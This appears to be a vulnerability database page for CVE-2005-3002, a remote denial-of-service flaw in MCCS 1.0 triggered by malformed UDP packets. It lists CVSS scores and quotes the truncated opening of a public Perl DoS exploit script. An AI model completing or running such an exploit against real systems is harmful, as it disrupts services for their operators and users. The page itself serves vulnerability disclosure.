5
CVSSv2

CVE-2005-3002

Published: 20/09/2005 Updated: 08/03/2011
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

Multi-Computer Control System (MCCS) 1.0 allows remote malicious users to cause a denial of service via a malformed UDP packet.

Vulnerable Product Search on Vulmon Subscribe to Product

xclusive-software mccs 1.0

Exploits

#!usr/bin/perl # # MCCS Server\Client Command DOS Exploit # -------------------------------------- # Infam0us Gr0up - Securiti Research # # Info: infamous2hellcom # Vendor URL: wwwxclusive-softwarecom # use IO::Socket; print("\n MCCS Command DOS Exploit\n"); print("-----------------------------\n"); $str = "\x41"; if($#ARGV < 0 | $#ARG ...